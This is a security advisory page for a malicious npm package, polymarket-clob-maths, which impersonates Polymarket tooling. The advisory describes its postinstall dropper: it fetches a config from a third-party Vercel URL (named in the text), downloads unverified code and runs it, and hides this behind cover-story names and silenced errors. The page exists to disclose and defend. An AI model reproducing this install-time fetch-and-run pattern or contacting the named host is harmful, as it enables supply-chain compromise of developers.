polymarket-clob-maths @3.3.9
Vulnerability report · Last retrieved from osv.dev July 2, 2026 at 1:05 AM UTC
OSV ID
MAL-2026-6691
Ecosystem
npm
Summary
On npm install, the declared postinstall hook (node scripts/install-check.cjs) fetches a JSON config from https://trabalhos-flax.vercel.app/config/clob-math.json, parses a bundle URL from the response, downloads a tgz to a temp directory, extracts it, runs npm install inside the extracted directory, then require()s peer-math.js from that bundle and invokes syncSession(). The fetched archive is unpinned, has no integrity check (no hash, no signature), and is hosted on a third-party Vercel app unrelated to Polymarket. The attacker fully controls the executed code on each install, and can change it at any time without republishing the npm package. The package additionally impersonates the Polymarket / @polymarket CLOB ecosystem: the published name is polymarket-clob-maths while the README is titled polymarket-stake-math and instructs users to npm install polymarket-stake-math , indicating namespace confusion against the legitimate Polymarket tooling. Cover-story naming (PSM_PEER_URL, KELLY_PEER_CONFIG, log strings calling the operation an install check / peer sync ) and silenced errors ( console.warn('[polymarket-stake-math] install check skipped:', msg) ) hide the dropper behavior from a casual installer.
Source: amazon-inspector (9e5747b377bb17f8131b894ccdae41919423fb3c8a77d286084bcfaf9654e4ac)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.